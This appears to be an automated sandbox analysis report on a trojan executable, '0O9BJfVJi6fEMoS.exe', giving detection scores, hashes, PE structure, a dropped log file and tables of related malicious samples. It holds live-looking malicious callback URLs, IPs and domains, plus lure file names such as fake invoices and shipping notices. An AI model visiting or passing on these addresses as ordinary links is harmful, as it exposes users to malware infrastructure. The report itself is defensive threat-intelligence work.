                                                                        Sample file name:0O9BJfVJi6fEMoS.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:20
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@10/1@12/9
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 18.3% (good quality ratio 16.7%)
                                                                        • Quality average: 74.4%
                                                                        • Quality standard deviation: 31%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 189
                                                                        • Number of non-executed functions: 152
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 51.104.144.132, 13.64.90.137, 40.88.32.150, 92.122.145.220, 104.42.151.234, 13.88.21.125, 168.61.161.212, 104.43.193.48, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.132.208.181
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        10:06:32API Interceptor2x Sleep call for process: 0O9BJfVJi6fEMoS.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        202.66.173.116Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                                        • www.karthikeyainfraindia.com/uszn/?Bl=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZQFCo5S/6318vrLYaQ==&Qvu=JlztTp78Drg
                                                                        35.246.6.109Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                        • www.kanaai.com/blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L
                                                                        Order_20180218001.exeGet hashmaliciousBrowse
                                                                        • www.pamsinteriors.com/seon/?EJBpf8l=BeyjuOpWFnXPmJwCXss3Kf1c/WkomheBvhalLCEmx4oBhDIsdeYLlupEzXnVn3Elg/0a&kDKHiZ=QFNTw2k
                                                                        ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        • www.equiposddl.com/4qdc/?jpaha=seo4KtASU38iE1JxvFjoxqkgDldoxUIk7lgrfGyblEtLt+g6uaUe1PngqhTXQae7QGmK3w==&3fz=fxopBn3xezt4N4a0
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • www.deepdewood.com/dka/?9rYD4D2P=8Eq/i2VOsbL+cvGSr7jtksOkLx2JSoJy2W2Vokw4XdtvBNdBMtYC7BHfOEJyNL5XOcwi&4h=vTxdADNprBU8ur
                                                                        c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                                        • www.cpnpproductions.com/ivay/?Lh0l=ZTdp62D8T&oPnpM4=vFzBmzYkSE6NJX5Oi9qDw7LP1Ie3GejevhUpCGfEyuF65umwf1lNU0clWPDg340Y/N7A
                                                                        DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                                        • www.diamondmobiledetailingmo.com/cna8/?kRjH3=D+j2eq9KshChsJfpYDP3dQ9JuFiLgHAjcH9HGbD94qE8IOb1eA4vp6C2dFUUzy2K5Yw6&0pn=WHuxqns0PJ
                                                                        PO copy.pdf.exeGet hashmaliciousBrowse
                                                                        • www.420cardsaz.com/mnf/?LZQd=c2FGkgrIiHx6A+YpbujIX/pRBzHucA6uVD2Iv2lwjcDMA3YdIOl90NbZkzPWKwdpkhTknLLKkw==&t6Ah=nvyxGvvP2N
                                                                        swift copy pdf.exeGet hashmaliciousBrowse
                                                                        • www.tryangel.store/bft/?_XALWr=jpmZLTSyBz2jdeueRsJVQUmFJk6s6P71pSFOa9DJ8TNzBfJyqx0h1w7Hy/WvHYDE5ViT&qL3=gdnLM6Jh-D
                                                                        Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
                                                                        • www.simsprotectionagency.com/h3qo/?t81X=MvZTWvl&CXaDp=fazjW/7YGCwLRHgRC8KmkP4D5qa6jsntndFx6UhabFksSDw+qabl0OCgPeILzj01MKkl
                                                                        VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                                        • www.inventorengenharia.com/rgc/
                                                                        PO-3170012466.exeGet hashmaliciousBrowse
                                                                        • www.belaronconsulting.com/bbk4/?tXi0=MXbP9&h0DhlHu=+EJRPCvoSUIWohgRtjoT+h+aJKJwz5L2awFUgvDh2tnrIXiNEBO46ihyAAukMj+gwlvj
                                                                        Docs.exeGet hashmaliciousBrowse
                                                                        • www.jobjori.com/mph/?2d8=uwes4NAAGJvbvTNDrnMSQtTrpf+STMgR9GkF363pIG/8747PqaoTfG32WzLUsEUtFvfI&BXnXAP=YrhH0RRxT8EL1Dl0
                                                                        evc421551.exeGet hashmaliciousBrowse
                                                                        • www.germbusterfl.com/yce/?EDKHEJ4=YvBIwtBNBxVWDZ3mSpdVPoUVjRg4HWVmbSak5PPFjoPFoBviop4cOcqLl6Bc6yfYKIGR&FhL=E2M4YLC06Jl
                                                                        3434355455453456789998765.exeGet hashmaliciousBrowse
                                                                        • www.fullspeedautomation.com/mlc/?YBZpb4BH=cKajpmj9ZvLEOZObpTfg1vSv7WANvvvZPHvLzMejPL5eBn3vSNfBC5rt5/2jiF+IxeM5&op=3f5H00mHa
                                                                        ships documents.xlsxGet hashmaliciousBrowse
                                                                        • www.enlightenedsoil.com/gqx2/?Czud=Dpp83ZapOz0DiPO&-Z7tZ=cjip6uuI9bZoUAnV+V+JPH7D0kYGWUsT6+5UMJSQ9+x3pL2tU/1BL1F+whUGJDO+/8leww==
                                                                        NsNu725j8o.exeGet hashmaliciousBrowse
                                                                        • www.thepoetrictedstudio.com/bw82/?qFN4JPfH=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&8p4=fjlP_N-pFZH4xV
                                                                        ki7710921.exeGet hashmaliciousBrowse
                                                                        • www.lukebaileydesigns.com/yce/?_FNl7h=BJjaWCSLcmhpwMCAbMgCEpA4KPsKmpI27R00KPA/4hm7M2Dmte16C6Vr3UX3AsCkXC07&qL3=g8nP-lQxEti
                                                                        YK5tmqQ18z.exeGet hashmaliciousBrowse
                                                                        • www.oilspilladjustersettlement.com/i032/
                                                                        lbqFKoALqe.exeGet hashmaliciousBrowse
                                                                        • www.1819apparel.com/csv8/?8pHXLLhp=XtNGIsK9NyfrmSyC60HBpItz0Umgq62yD1Tk73refEWRTM8pCZ2m1g8hKfyJT1do49NQ&hbs=CnehJPdp6XLP_rwP
                                                                        6tivtkKtQx.exeGet hashmaliciousBrowse
                                                                        • www.kindredkitchencatering.com/c8so/?BZL0RN=nQgjEQkVGYPM5UKeXNK2AnUvs9ry6NBQS/Ek/mciAV4zwBvL6PrZKUQFTVM5+2/gn+KNxiHJIQ==&3fPHK=w8O8gTXxNJq

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        td-balancer-euw2-6-109.wixdns.netPayment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        Order_20180218001.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        PO copy.pdf.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        swift copy pdf.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        PO-3170012466.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        Docs.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        evc421551.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        3434355455453456789998765.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        ships documents.xlsxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        NsNu725j8o.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        ki7710921.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        YK5tmqQ18z.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comlpdKSOB78u.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Order_20180218001.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        shed.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        IMG_7189012.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        InterTech_Inquiry.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        urBYw8AG15.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        fuS9xa8nq6.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        executable.2772.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        PO-098907654467.xlsxGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Docs.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        SecuriteInfo.com.generic.ml.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        DOC_KDB_06790-80.xlsxGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        IRS_Microsoft_Excel_Document_xls.jarGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        RFQ.# PO41000202103.exeGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        PREP LIST.docGet hashmaliciousBrowse
                                                                        • 3.223.115.185
                                                                        www.besteprobioticakopen.onlineVghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                                        • 94.23.162.163
                                                                        rXiuAV2CjtcXJNE.exeGet hashmaliciousBrowse
                                                                        • 94.23.162.163
                                                                        dGWioTejLEz0eVM.exeGet hashmaliciousBrowse
                                                                        • 54.38.220.85
                                                                        9tyZf93qRdNHfVw.exeGet hashmaliciousBrowse
                                                                        • 94.23.162.163
                                                                        www.horisan-touki.comVghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                                        • 118.27.99.84

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        NETMAGIC-APNetmagicDatacenterMumbaiINqIViYQyb0a.exeGet hashmaliciousBrowse
                                                                        • 205.147.110.238
                                                                        Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.htmlGet hashmaliciousBrowse
                                                                        • 202.87.61.190
                                                                        Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                                        • 202.66.173.116
                                                                        v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                        • 103.205.64.138
                                                                        2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                        • 103.205.64.138
                                                                        PO# 01222021.docGet hashmaliciousBrowse
                                                                        • 103.143.46.51
                                                                        DOK-012021.docGet hashmaliciousBrowse
                                                                        • 103.143.46.51
                                                                        DKMNT.docGet hashmaliciousBrowse
                                                                        • 103.143.46.51
                                                                        WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                                        • 103.143.46.51
                                                                        file.docGet hashmaliciousBrowse
                                                                        • 103.143.46.51
                                                                        Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                                        • 103.143.46.51
                                                                        DEX182020.exeGet hashmaliciousBrowse
                                                                        • 103.120.177.86
                                                                        79685175.docGet hashmaliciousBrowse
                                                                        • 103.235.105.46
                                                                        79685175.docGet hashmaliciousBrowse
                                                                        • 103.235.105.46
                                                                        PO#064612 291220.docGet hashmaliciousBrowse
                                                                        • 103.235.105.46
                                                                        9182483287326864.docGet hashmaliciousBrowse
                                                                        • 103.205.64.138
                                                                        City Report - December.docGet hashmaliciousBrowse
                                                                        • 103.205.64.138
                                                                        RFQ Order - Mediform S.A-pdf.exeGet hashmaliciousBrowse
                                                                        • 101.53.153.202
                                                                        https://faxting.sn.am/lZZ1Qol7sWqGet hashmaliciousBrowse
                                                                        • 103.205.64.138
                                                                        UqjZpY9ltr.docGet hashmaliciousBrowse
                                                                        • 103.235.106.140
                                                                        GOOGLEUSPayment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        dex.dexGet hashmaliciousBrowse
                                                                        • 142.250.185.202
                                                                        dex.dexGet hashmaliciousBrowse
                                                                        • 142.250.185.170
                                                                        SKBM 0222.exeGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        lpdKSOB78u.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        vBugmobiJh.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        crypted.exeGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        NewOrder.xlsmGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        Order_20180218001.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • 35.186.238.101
                                                                        ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                        • 142.250.186.74
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        Order83930.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                        • 142.250.186.33
                                                                        DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        OVHFRSecuriteInfo.com.Variant.Zusy.368685.25618.exeGet hashmaliciousBrowse
                                                                        • 51.68.21.186
                                                                        Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                        • 198.27.88.111
                                                                        Quotation Reques.exeGet hashmaliciousBrowse
                                                                        • 51.83.43.226
                                                                        8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                        • 51.68.21.186
                                                                        iKohUejteO.dllGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        PO No. 104393019_pdf.exeGet hashmaliciousBrowse
                                                                        • 51.195.53.221
                                                                        nTqV6fxGXT.exeGet hashmaliciousBrowse
                                                                        • 51.254.175.184
                                                                        Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                                                        • 66.70.204.222
                                                                        File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                        • 51.75.61.103
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • 213.186.33.5
                                                                        SecuriteInfo.com.Trojan.MinerNET.8.3277.exeGet hashmaliciousBrowse
                                                                        • 149.202.83.171
                                                                        qb1fg.dllGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        legislate.02.21.docGet hashmaliciousBrowse
                                                                        • 94.23.162.163
                                                                        DSUb6KKsK4Get hashmaliciousBrowse
                                                                        • 139.99.239.154
                                                                        7BBkQmAauX.dllGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        URGENT QUOTATION.exeGet hashmaliciousBrowse
                                                                        • 51.195.53.221
                                                                        Subconract 504.xlsmGet hashmaliciousBrowse
                                                                        • 37.187.115.122
                                                                        87BB0T225KLOI88U44D000DS2F4H414DD.vbsGet hashmaliciousBrowse
                                                                        • 144.217.17.185
                                                                        leaseplan-invoice-831008_xls2.HtMlGet hashmaliciousBrowse
                                                                        • 146.59.152.166
                                                                        (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                                        • 188.165.242.45

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0O9BJfVJi6fEMoS.exe.log
                                                                        Process:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.607328217239554
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:0O9BJfVJi6fEMoS.exe
                                                                        File size:816640
                                                                        MD5:18ec78e09155c046a203fb4dcbc3593f
                                                                        SHA1:40e67eef7c001a8752763616fc9a58170721c27a
                                                                        SHA256:01c5ac824171a164473d92187f8031f2bc7103397fe534f56771d8e9589445e0
                                                                        SHA512:28801c6b546515f4fb67f199f70b160dffb41434bcb465f92d3f20dbad698194f162b443571ea267a1dd7c7ef0bcaf4bb82116c37d3a83433f9d3de28083234e
                                                                        SSDEEP:6144:kxwz1c/yd0cGqrtttttwgGCyWI+XEmlm4gA2YhFp0ksvQZIcQXzjUIBElb6oBbc3:J/wCEzmg4sYhgkqXzwOw47Zf5
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...HO4`..............0......^.......5... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:f0cac2d8dcdcd43c

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4a35a2
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x60344F48 [Tue Feb 23 00:41:44 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa35500x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x25bbc.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xa15a80xa1600False0.614729073877data6.73482892529IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xa40000x25bbc0x25c00False0.40512468957data5.78348290735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xca0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0xa42b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xa84d80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xac7000x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
